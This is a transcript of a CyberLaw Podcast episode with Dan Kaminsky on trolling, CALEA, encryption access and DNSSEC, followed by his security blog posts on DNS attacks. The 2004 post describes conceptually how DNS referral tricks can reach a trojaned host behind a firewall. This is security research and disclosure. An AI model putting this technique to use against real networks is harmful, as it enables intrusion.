Stewart: One more story just to show that I was well ahead of the Chinese on this – my first security clearance they asked me for people with whom I had obligations of affection or loyalty, who were foreigners. And I said I’m an international lawyer – this was before you could just print out your Outlook contacts – I Xeroxed all those sheets of business cards that I’d collected, and I sent it to the guys and said, “These are all the clients or people I’ve pitched,” and he said, “There are like 1,000 names here.” I said, “Yeah, these are people that I either work for or want to work for.” And he said, “But I just want people to whom you have ties of obligation or loyalty or affection.” I said, “Well, they’re all clients and I like them and I have obligations to clients or I want them to be. I’ve pitched them.” And he finally stopped me and said, “No, no, I mean are you sleeping with any of them?” So good luck China, figuring out which of them, if any, I was actually sleeping with.

Dan: You see, you gave up all those names to China.

Stewart: They’re all given up.

Dan: Look what you did!

Stewart: Exactly; exactly. Okay, last a topic – Putin’s trolls – I thought this was fascinating. This is where the New York Times really distinguished itself with this article because it told us something we didn’t know and it shed light on kind of something astonishing. This is the internet association I think. Their army of trolls, and the Chinese have an even larger army of trolls, and essentially Putin’s FSB has figured out that if you don’t want to have a Facebook revolution or a Twitter revolution you need to have people on Twitter, on Facebook 24 hours a day, posting comments and turning what would otherwise be evidence of dissent into a toxic waste dump with people trashing each other, going off in weird directions, saying stupid things to the point where no one wants to read the comments anymore.

It’s now a policy. They’ve got a whole bunch of people doing it, and on top of it they’ve decided, “Hell, if the US is going to export Twitter and Twitter revolutions then we’ll export trolling,” and to the point where they’ve started making up chemical spills and tweeting them with realistic video and people weighing in to say, “Oh yeah, I can see it from my house, look at those flames.” All completely made up and doing it as though it were happening in Louisiana.

Dan: The reality is that for a long time the culture has managed. We had broadcasts, broadcasters had direct government links, everything was filtered, and the big experiment of the internet was what if we just remove those filters? What if we just let the people manage it themselves? And eventually astroturfing did not start with Russia; there’s been astroturfing for years. It’s where you have these people making fake events and controlling the message. What is changing is the scale of it. What is changing is who is doing it. What is changing is the organization and the amount of investment. You have people who are professionally operating to reduce the credibility of Twitter, of Facebook so that, quote/unquote, the only thing you can trust is the broadcast.

Stewart: I think that’s exactly right. I think they call the Chinese version of this the 50 Cent Army because they get 50 cents a post. But I guess I am surprised that the Russians would do that to us in what is plainly an effort to test to see whether they could totally disrupt our emergency response, and it didn’t do much in Louisiana but it wouldn’t be hard in a more serious crisis, for them to create panic, doubt and certainly uncertainty about the reliability of a whole bunch of media in the United States.

This was clearly a dry run and our response to it was pretty much that. I would have thought that the US government would say, “No, you don’t create fake emergencies inside the United States by pretending to be US news media.”

Jason: I was going to say all those alien sightings in Roswell in the last 50 years do you think were Russia or China?

Stewart: Well, they were pre Twitter; I’m guessing not but from now on I think we can assume they are.

Dan: What it all comes back to is the crisis of legitimacy. People do not trust the institutions that are around them. If you look there’s too much manipulation, too much skin, too many lives, and as it happens institutions are not all bad. Like you know what? Vaccines are awesome but because we have this lack of legitimacy people are looking to find what is the thing I’m supposed to be paying attention to, because the normal stuff keeps coming out that it was a lie and really, you know what, what Russia’s doing here is just saying, “We’re going to find the things that you’re going to instead, that you think are lying; we’re going to lie there too because what we really want is we want America to stop airing our dirty laundry through this Twitter thing, and if America is not going to regulate Twitter we’re just going to go ahead and make a mess of it too.”

Stewart: Yeah. I think their view is, “Well, Twitter undermines our legitimacy; we can use it to undermine yours?”

Dan: Yeah, Russians screwing with Americans; more likely than you think.

Michael: I’m surprised you guys see it as an effort to undermine Twitter; this strikes me as classic KGB disinformation tactics, and it seems to me they’re using a new medium and, as you said before, they’re doing dry runs so that when they actually have a need to engage in information operations against the US or against Ukraine or against some other country, they’ll know how to do it. They’ll have practiced cores of troll who know how to do this stuff in today’s media. I don’t think they’re trying to undermine Twitter.

Stewart: One of the things that interesting is that the authoritarians have figured out how to manage their people using electronic tools. They were scared to death by all of this stuff ten years ago and they’ve responded very creatively, very effectively to the point where I think they can maintain an authoritarian regime for a long time, without totalitarianism but still very effectively. And now they’re in the process of saying, “Well, how can we use these tools as a weapon the way they perceive the US has used the tools as weapon in the first ten years of social media.” We need a response because they’re not going to stop doing it until we have a response.

Michael: I’d start with the violation of the missile treaty before worrying about this so much.

Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in the case we talked about a while ago; this is the guy who wrote really vile and threatening and scary things about his ex wife and the FBI agent who came to interview him and who said afterwards, after he’d posted on Facebook and was arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t,” and the Supreme Court was asked to decide whether the test for threatening action is the understanding of the writer or the understanding of the reader? At least that’s how I read it, and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived, was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded but it probably also doesn’t have enough to do with CyberLaw in the end to pursue. Let’s close up with one last topic, which is the FBI is asking for or talking about expanding CALEA to cover social media, to cover communications that go out through direct messaging and the like, saying it’s not that we haven’t gotten cooperation from social media when we wanted it or a wiretap; it’s just that in many cases they haven’t been able to do it quickly enough and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to actually change CALEA, which is the Communications Assistance Law Enforcement Act from 1994, and impose that obligation on cellphone companies and then later on voiceover IP providers. Jason, what are the prospects for this? How serious a push is this?


Jason: Well, prospects are – it’s DOA – but just to put it in a little bit of historical perspective. So Going Dark has of late been the name for the FBIs effort to deal with encryption, but the original use of that term, Going Dark was, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet based communications, Going Dark was the term they used for that effort. They would cite routinely the fact that there was a very significant number of wiretaps in both criminal and national security case that providers that were not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; they by definition has already definition had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute that authority that they already had. As you suggested, either the wiretap couldn’t be done at all or the provider and the government would have to work together to develop a technical solution which could take months and months, by which time the target wasn’t using that method of communication anymore; had moved onto something else.

So for the better part of four years, my last four years at the department, the FBI was pushing along with DEA and some other agencies, for a massive CALEA reform effort to expand it to internet based communications. At that time – this is pre Snowden; it’s certainly truer now – but at that time it was viewed as a political non starter, to try to convince providers that CALEA should be expanded.

So they downshifted as a Plan B to try to amend Title 18, and I think there were some parallel amendments to Title 50, but the Title 18 amendments would have dramatically increased the penalties for provider who didn’t have the capability to implement a wiretap order, a valid wiretap order that law enforcement served.

There would be this graduating series of penalties that would essentially create a significant financial disincentive for a provider not to have in their sight capability in advance or to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded was willing to settle for this sort of indirect way to achieve the same thing; to incentivize providers to develop an intercept solutions.

That was an unlikely Bill to make it to the Hill and to make it through the Hill before Snowden; after Snowden I think it became politically plutonium. It was very hard even before Snowden to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post Snowden world.

What struck me about this story though is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA, and the only thing I can interpret is either that the people running this effort now are unaware of the previous history that they went through, or they’ve just decided what the hell; they have nothing to lose. They’re unlikely to get it through anyway so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue I think partly on what the hell, this is what we want, this is what we need, we might as well say so, and partly I think preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts is we’re getting hacked left and right; we’re leaking data left and right, and all these guys can talk about is how they want to leak more data. Like when we finish here this is about encryption. We’re not saying we’re banning encryption but if there’s encryption and we can’t get through it we’re going to have a graduated series of costs or we’re going to pull CALEA into this. There’s entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing, know whatever we’re doing, whatever would actually work, is actually under threat. There are lots of scammers out there; oh my goodness, there are some great, amazing, 1990s era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in because I had promised I was going to talk about this from the news roundup to this question – Julian Sanchez raised it; I raised it with Julian at a previous podcast. We were talking about the effort to get access to encrypted communications and I mocked the people who said, “Oh, you can never provide access without that; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk and you have to manage it but sometimes the security risk and the cost of managing it is worth it because of the social values.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into because it seemed to be more technical than he was comfortable with which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End to end encryption?” The only end to end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. The point is the idea that building in access is always a stupid idea, never worth it. It’s just wrong, or at least it’s inconsistent with the security practices that we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties because Google insists that they be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept and DLP and analytics role to the endpoint because operating it as a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property, you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But the problem that the companies have, which is weighing the importance of end to end encryption for security versus the importance of being able to monitor activity for security, they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment that society can make just as easily. Once you’ve had the debate society can say, “You know, on the whole, ensuring the privacy of everybody in our country versus the risks of criminals misusing that data, we’re prepared to say we can take some risk on the security side to have less effective end to end encryption in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s a thing though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them. If they’ve been given end to end – I agree with you – there’s a debate; I’m happy to continue debating it but I’ve lost so far. But you say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel, you can’t break that just stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road.

Stewart: because they don’t do no good.

Dan: isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of a contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio too, but nobody in Akron gets a vote about where their end to end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end to end encryption methodology that has been widely deployed. I agree with you, people are moving away from man in middle and are looking to find ways to break into systems at the endpoint or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC because we had a great fight over SOPA and DNSSEC, and I guess the question for me is what – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something, hit the encrypt button, you move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing to the internet. It would be nice if keying was just as easy, but let me tell you, how do you go ahead and go out and talk to all these internet people about how great DNSSEC is when really it’s very clear DNS itself – it’s not like SOPA fights, it’s not going to come back –

Stewart: Yeah; well, maybe.

Dan: – and it’s not like the security establishment, which should be trying to make America safer, it’s like, “Man, we really want to make sure we get our keys in there.” When that happens [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on politically [the DNS and its contents] being sacrosanct.

Stewart: Obviously, DHS, the OMB committed to getting DNSSEC deployed at the federal level, and so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that besides the security establishment that’s keeping on saying, “Hey, we’ve got to be able to get our keys in there too,” has really – we’ve got this dual mission problem going on here. Any system with a dual mission, no one actually believes there’s a dual mission, okay.

If the Department of Transportation was like, “Maybe cars should cars should crash from time to time,” if Health or Human Services was like, “Hey, you know, polio is kind of cool for killing some bad guys.” No one would take those vaccines because maybe it’s the other mission and that’s kind of the situation that we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea five years from now what you’re going to do with it, and so instead it’s being replaced with garbage [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value add is it’s a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value add and it never scales, it never works but we keep trying because we’ve got to do something because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps and let me tell you what I think WhiteOps does and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots into pack up and exfiltrate data. They’re logging on and bots look different from human beings when they type stuff and the people who are trying to manage an intrusion remotely also looks different from somebody who is actually on the network and what WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And it’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay. That’s not going to happen. So our observation is that we have this very strong signal, it’s not perfect because sometimes people VPN in, sometimes people make scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine; you can pick it up in JavaScript. So you have a website that’s being lilypad accessed either through bulk communications with command and control to a bot, or through interaction with remote control, churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is how come we took this long to have that observation become a company?

Dan: I don’t know but we built it. The reality is, is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years so we’re basically taking all these bugs that actually never let you attack the user but they have completely different responses inside of a bot environment. That’s kind of the secret sauce.

Every browser is really a core object that reads HTML 5, Java Scripted video, all the things you’ve got to do to be a web browser. Then there’s like this goop, right? Like it puts it on the screen, it has a back button, uses an address bar, and lets you configure stuff, so it turns out that the bots use the core not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers; not trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well guarded networks?

Dan: I think one story I really enjoy – we actually ran the largest study into ad fraud that had ever been done, of its nature. We found that there’s going to be about $6 billion of ad fraud at http://whiteops.com/botfraud, and we had this one case, so we tell the world we’re going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

We actually ran a test from a little bit in July, all the way through September and we watched this one campaign; 40 percent fraud, then when we said we were going to start, three percent fraud. Then when we said we’re going to start, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customers – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java? This is the first time in my life I have ever been dealing with why. People are doing this fraud to make money. Let’s stop the checks from being written? It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool, and it is – I guess maybe this is the observation. We wasted so much time trying to keep people out of systems hopelessly; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people when they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in Michael, Jason; I appreciate it.

Just to close up the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com; leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail. We haven’t got them. This has been episode 70 of the Steptoe CyberLaw Podcast brought to by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, who is the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI; Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy in government.

Categories: Security

Summaries

August 8, 2008 4 comments

Very nice summary of the “How” part of my talk here.

I do think “Why does DNS matter this much?” is a more important question.  It’s 2008 — why can I still not email securely between companies?  It’s a little sad that such a simple and basic bug can:

1) Break past most username/password prompts on websites, no matter how the site is built.
2) Break the Certificate Authority system used by SSL, because Domain Validation sends an email and email is insecure.
3) Expose the traffic of SSL VPNs, because heh, who needs to check certificates anyway
4) Force malicious automatic updates to be accepted
5) Cause millions of lines of totally unfuzzed network code to be exposed to attack
6) Leak TCP and UDP connectivity behind the firewall, to any website, in an attack we thought we already fixed twice now
7) Expose the traffic of tools that aren’t even pretending to be secure, because “it’s behind the firewall” or “protected by a split-tunneling IPsec VPN”.

It’s just DNS cache poisoning.  Why does it get to do this much damage? 

The whole “hostile vs. safe” network myth needs to die.  Every network is hostile — the DNS bug just made true something that should already have been assumed, but wasn’t.  And we need to get faster and better at fixing the infrastructure.  Using things until the moment of catastrophic failure — be they bridges, DNS, or MD5 — is a problem, and we can do better.

FX of Phenoelit made an important point a while back — everything you can do with this DNS attack, you can do with SNMPv3.  If you haven’t patched your routers — and that includes your internal routers, since Java’s giving UDP access out and you can thus issue SNMP queries with it (not their fault, the entire web security model collapses when DNS is broken and this is just yet another break) — you should probably do that too.

It’s going to be an interesting couple of months.  We’re going to see a lot of blended/combination attacks, as attacks we thought were infeasible in the real world suddenly start proving themselves entirely viable (at least, given insecure infrastructure).  The previously unfuzzed network clients are probably going to be particularly problematic — if you write a network app that is not a web browser, now is a good time to start feeding random (or even better, semi-random) data to it and switching the autoupdater to SSL.  New attacks are already popping up, only a few days in.  Ben Laurie just came out with a harrowing and beautiful advisory against some common OpenID deployments.  I knew about the intersection of DNS and OpenID, and I knew about the intersection of DNS and Debian’s badly generated certs (a problem which, I’d like to point out, is much harder to patch due to our continuing lack of an effective certificate revocation infrastructure).  But it took Ben Laurie to attack “Secure” OpenID providers using Debian Certs via DNS.  Fantastic, excellent work.

Categories: Security

Packet Geeks Gone WWWild

August 2, 2007 Leave a comment

OK, I was *trying* not to mess with DNS, but the combination of “DNS”, “Firewall”, and “Tunneling” proved just too tempting for me to ignore. Here’s the slides from my Black Hat talk — I’ll update after Defcon, but yeh, here’s what I’m playing with!

Black Ops 2007: Design Reviewing The Web

Everyone’s talkin’ about the TCP relaying stunts, but there’s also Audio CAPTCHA analysis and (my favorite) concrete mechanisms for busting Provider Hostility.

(What’s Provider Hostility? The opposite of Network Neutrality. Not fun.)

Categories: Security

Quick Summary: What's New?

August 1, 2004 Leave a comment

OK, let me repeat.

Throwing arbitrary data in DNS — NOT a big deal.

Even doing network tunneling over DNS — ALSO not that big a deal; NSTX has been doing this for a while. (That being said — SSH over DNS adds strong cryptography and major cross platform compatibility that didn’t exist before.)

DNS radio is new. By segmenting audio into small chunks, we actually get universal caching of the streaming signal — a functionality we’ve never really had before. Generally, audio broadcast over the Internet falls apart after a few thousand users. Based on this ring-buffer-into-BIND architecture, combined with the utterly minimal bandwidth load of Speex, we should be able to host audio for a much greater number of listeners.

The entire suite of incoming attacks to firewalls are also new. DNS trusts the hierarchy to tell it the next hop to its target name; since I can acquire second level domains in the hierarchy for minimal cost, it’s trivial for me to insert arbitrary destinations along the DNS route path. In technical terms, whenever a recursing resolver comes to my name server to resolve a name, rather than providing an answer, I can redirect that request to another, supposedly authoritative server. That server can be at any address — even one I cannot IP route to — but if the resolver communicating with me can route to that address (say 10.0.1.11) my communication will reach that host. If there’s an SSH over DNS daemon running on 10.0.1.11, I’ve now achieved incoming connectivity to the network of my choice, completely bypassing firewalls and a trojan’s need to poll.

Recursion on dual hosted interfaces is not even necessary. There are large numbers of applications that, upon receiving untrusted traffic, execute DNS name lookups. Most commonly, they are reverse PTR lookups, but occasionally there are other types (MX from mail servers, most notably) that can be easily induced. When they are induced, the hierarchy is followed. When the hierarchy is followed, the attacks previously discussed start working. In practice, this means an IDS triggers the DNS server to start proxying traffic between an external attacker host and an internal trojaned machine. Nasty.

There’s some other stuff — check out the slides and the code — but long story short, there’s some new stuff out 🙂

Categories: Security